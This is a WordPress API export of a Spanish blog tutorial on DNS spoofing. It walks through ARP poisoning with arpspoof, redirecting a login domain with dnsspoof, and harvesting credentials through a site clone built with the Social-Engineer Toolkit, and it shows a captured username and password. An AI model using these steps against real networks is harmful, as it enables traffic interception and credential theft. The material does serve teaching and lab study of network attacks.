define('DISALLOW_FILE_EDIT', true);
define('DISALLOW_FILE_MODS', true);{"id":316,"date":"2020-01-25T20:26:37","date_gmt":"2020-01-25T19:26:37","guid":{"rendered":"http:\/\/www.monovarlinux.org\/?p=316"},"modified":"2020-01-25T20:29:14","modified_gmt":"2020-01-25T19:29:14","slug":"dns-spoofing","status":"publish","type":"post","link":"http:\/\/www.monovarlinux.org\/?p=316","title":{"rendered":"DNS SPOOFING"},"content":{"rendered":"<p>El ataque DNS SPOOFING es un extra del envenenamiento ARP.<\/p>\n<p>Primero, envenenamos la tabla ARP para hacer pasar el trafico por nuestro equipo atacante y a continuaci\u00f3n levantamos un servidor dns propio para redirigir a nuestra victima a la m\u00e1quina atacante.<\/p>\n<p>Para realizar el DNS SPOOFING primero tenemos que realizar un envenenamiento de la tabla ARP (ARP SPOOFING) de los equipos haciendoles creer que nuestro equipo es el router de la red. (con el ip_forward activado) para que nuestra m\u00e1quina haga forward de los paquetes.<\/p>\n<p>En este caso nuestro escenario, seria este:<\/p>\n<p>Equipo victima: 192.168.1.88<br \/>\nRouter red:\u00a0\u00a0\u00a0\u00a0 192.168.1.1<br \/>\nAtacante:\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 192.168.1.50<\/p>\n<p>1. ARP SPOOFING: Ejecutamos en la m\u00e1quina atacante:<\/p>\n<p># arpspoof -i eth0 192.168.1.1<br \/>\n# echo 1 &gt; \/proc\/sys\/net\/ipv4\/ip_forward<\/p>\n<p>Con el comando anterior, permanentemente lo que haremos es decirle a TODOS los dispositivos de la red que 192.168.1.1 somos nosotros (el atacante 192.168.1.50) por lo que todos los hosts de esta red enviar\u00e1n el trafico hacia nuestro equipo y nosotros lo reenviaremos al router real (por eso el ip_forward activado).<\/p>\n<p>2. DNSSPOOF:<\/p>\n<p>Esta utilidad se puede encontrar en distribuciones como Kali Linux y lo que har\u00e1 es solamente realizar la resoluci\u00f3n de nombres que hayamos indicado. Es decir, todas las consultas las ignorar\u00e1, solamente realizar\u00e1 el \u00abenga\u00f1o\u00bb en los hosts que hayamos indicado en &#8216;resol.txt&#8217;:<\/p>\n<p>&#8211; Creamos el archivo resol.txt:<br \/>\necho \u00ab192.168.1.50 login.panel.com\u00bb &gt; resol.txt<\/p>\n<p>&#8211; Ejecutamos dnspoof:<br \/>\ndnsspoof -i eth0 -f resolt.txt<\/p>\n<p>Con dnsspoof ejecutandose y escuchando peticiones DNS, cuando alguien decida visitar login.panel.com lo que estar\u00e1 haciendo es resolver hacia nuestra maquina atacante. Con lo que si nosotros armamos una \u00abcopia\u00bb de la web que queramos podemos enga\u00f1ar a la victima para conseguir las credenciales que nos interesan.<\/p>\n<p>Para realizar la copia del sitio y levantar un servidor web con el contenido \u00abclon\u00bb podemos utilizar la utilidad &#8216;settoolkit&#8217; que viene con Kali Linux:<\/p>\n<p>Esta son las opciones que tendremos que usar dentro de settoolkit:<\/p>\n<p>\/usr\/share\/set\/setoolkit<br \/>\n1 &#8211; Social Engineering Attacks<br \/>\n2 &#8211; Website Attack Vectors<br \/>\n3 &#8211; Credential Harvester Attack Method<br \/>\n2 &#8211; Site Cloner<\/p>\n<p>IP Address for the POST back&#8230;.: 192.168.1.50\u00a0\u00a0 &lt;IP de nuestra maquina. Atacante&gt;<br \/>\nEnter the url to clone: login.panel.com<\/p>\n<p>Una vez que hayamos completado los pasos anteriores settoolkit quedar\u00e1 ejecutandose. La victima, al visitar &#8216;login.panel.com&#8217; y introducir ahi sus credenciales, obtendriamos esto:<\/p>\n<p>(&#8216;Array\\n&#8217;,)<br \/>\n(&#8216;(\\n&#8217;,)<br \/>\n(&#8216;\u00a0\u00a0\u00a0 [type] =&gt; account\\n&#8217;,)<br \/>\n(&#8216;\u00a0\u00a0\u00a0 [username] =&gt; Juan\\n&#8217;,)<br \/>\n(&#8216;\u00a0\u00a0\u00a0 [password] =&gt; 2250\\n&#8217;,)<br \/>\n(&#8216;\u00a0\u00a0\u00a0 [Submit] =&gt; Log In\\n&#8217;,)<br \/>\n(&#8216;)\\n&#8217;,)<\/p>\n<p>Como podemos observar, el usuario ha introducido &#8216;Juan&#8217; como usuario y &#8216;2250&#8217; como password.<\/p>\n<p>Eso es todo.<\/p>\n<div class=\"be-social\" data-url=\"http:\/\/www.monovarlinux.org\/?p=316\" data-base=\"\" data-title=\"DNS SPOOFING\" data-track=\"true\" data-via=\"\" data-show=\"{&quot;facebook&quot;:true,&quot;twitter&quot;:true,&quot;google&quot;:true,&quot;reddit&quot;:true,&quot;linkedin&quot;:true,&quot;meneame&quot;:true}\" ><h2 class=\"be-social-title\">Share<\/h2><\/div>","protected":false},"excerpt":{"rendered":"<p>El ataque DNS SPOOFING es un extra del envenenamiento ARP. Primero, envenenamos la tabla ARP para hacer pasar el trafico por nuestro equipo atacante y a continuaci\u00f3n levantamos un servidor dns propio para redirigir a nuestra victima a la m\u00e1quina &hellip; <a href=\"http:\/\/www.monovarlinux.org\/?p=316\">Sigue leyendo <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[6],"tags":[],"_links":{"self":[{"href":"http:\/\/www.monovarlinux.org\/index.php?rest_route=\/wp\/v2\/posts\/316"}],"collection":[{"href":"http:\/\/www.monovarlinux.org\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.monovarlinux.org\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.monovarlinux.org\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.monovarlinux.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=316"}],"version-history":[{"count":3,"href":"http:\/\/www.monovarlinux.org\/index.php?rest_route=\/wp\/v2\/posts\/316\/revisions"}],"predecessor-version":[{"id":319,"href":"http:\/\/www.monovarlinux.org\/index.php?rest_route=\/wp\/v2\/posts\/316\/revisions\/319"}],"wp:attachment":[{"href":"http:\/\/www.monovarlinux.org\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=316"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.monovarlinux.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=316"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.monovarlinux.org\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=316"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}